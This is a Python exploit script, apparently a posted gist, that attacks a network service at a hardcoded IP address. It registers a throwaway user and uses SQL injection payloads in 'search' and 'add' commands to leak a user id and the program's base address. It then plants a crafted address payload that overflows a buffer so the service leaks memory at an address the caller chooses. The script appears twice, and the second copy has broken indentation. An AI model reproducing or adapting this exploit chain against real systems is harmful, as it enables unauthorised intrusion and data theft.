balidani/leak_exploit.py Secret

## leak_exploit.py
import random
import socket
import string
import sys
import time

from binascii import hexlify
from binascii import unhexlify

def make_address(offset, address):
    return unhexlify("%016x" % (offset + address))[::-1]

def leak_data(address):

    HOST = '88.198.89.199'
    PORT = 1234

    # Connect
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.settimeout(2)

    s.recv(1024)

    # Generate user
    username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)])

    # Register
    s.sendall("register %s %s\n" % (username, username))
    s.recv(1024)

    # Login
    s.sendall("login %s %s\n" % (username, username))
    s.recv(1024)

    # Leak userid
    s.sendall("search x' union select id from users where name='%s'#\n" % (username))
    s.recv(1024)
    s.sendall("show 0\n")
    userid = int(s.recv(1024)[3:])

    # print "Userid: %d" % userid

    # Leak base address
    s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n")
    s.recv(1024)
    s.sendall("show 11\n")
    s.recv(4)
    offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0
    # print "Base address: 0x%x" % offset
    s.recv(1024)

    # Add dummy value and payload
    payload = '\x00' * 56 + '\x02' + '\x00' * 7
    payload += make_address(offset, 0x223d)
    payload += make_address(offset, 0x2238)
    payload += make_address(offset, 0x2020)
    payload += make_address(offset, address)
    payload = hexlify(payload)

    s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload))
    s.recv(1024)

    # Overflow payload to 0x203d68
    s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid)
    s.recv(1024)

    # Test
    s.sendall("help\n")
    s.recv(1024)

    data = s.recv(1024)[115:]
    print "Leaked: %s" % hexlify(data[:-1])

leak_data(int(sys.argv[1], 16))
	import random
	import socket
	import string
	import sys
	import time

	from binascii import hexlify
	from binascii import unhexlify

	def make_address(offset, address):
	return unhexlify("%016x" % (offset + address))[::-1]

	def leak_data(address):

	HOST = '88.198.89.199'
	PORT = 1234

	# Connect
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((HOST, PORT))
	s.settimeout(2)

	s.recv(1024)

	# Generate user
	username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)])

	# Register
	s.sendall("register %s %s\n" % (username, username))
	s.recv(1024)

	# Login
	s.sendall("login %s %s\n" % (username, username))
	s.recv(1024)

	# Leak userid
	s.sendall("search x' union select id from users where name='%s'#\n" % (username))
	s.recv(1024)
	s.sendall("show 0\n")
	userid = int(s.recv(1024)[3:])

	# print "Userid: %d" % userid

	# Leak base address
	s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n")
	s.recv(1024)
	s.sendall("show 11\n")
	s.recv(4)
	offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0
	# print "Base address: 0x%x" % offset
	s.recv(1024)

	# Add dummy value and payload
	payload = '\x00' * 56 + '\x02' + '\x00' * 7
	payload += make_address(offset, 0x223d)
	payload += make_address(offset, 0x2238)
	payload += make_address(offset, 0x2020)
	payload += make_address(offset, address)
	payload = hexlify(payload)

	s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload))
	s.recv(1024)

	# Overflow payload to 0x203d68
	s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid)
	s.recv(1024)

	# Test
	s.sendall("help\n")
	s.recv(1024)

	data = s.recv(1024)[115:]
	print "Leaked: %s" % hexlify(data[:-1])

	leak_data(int(sys.argv[1], 16))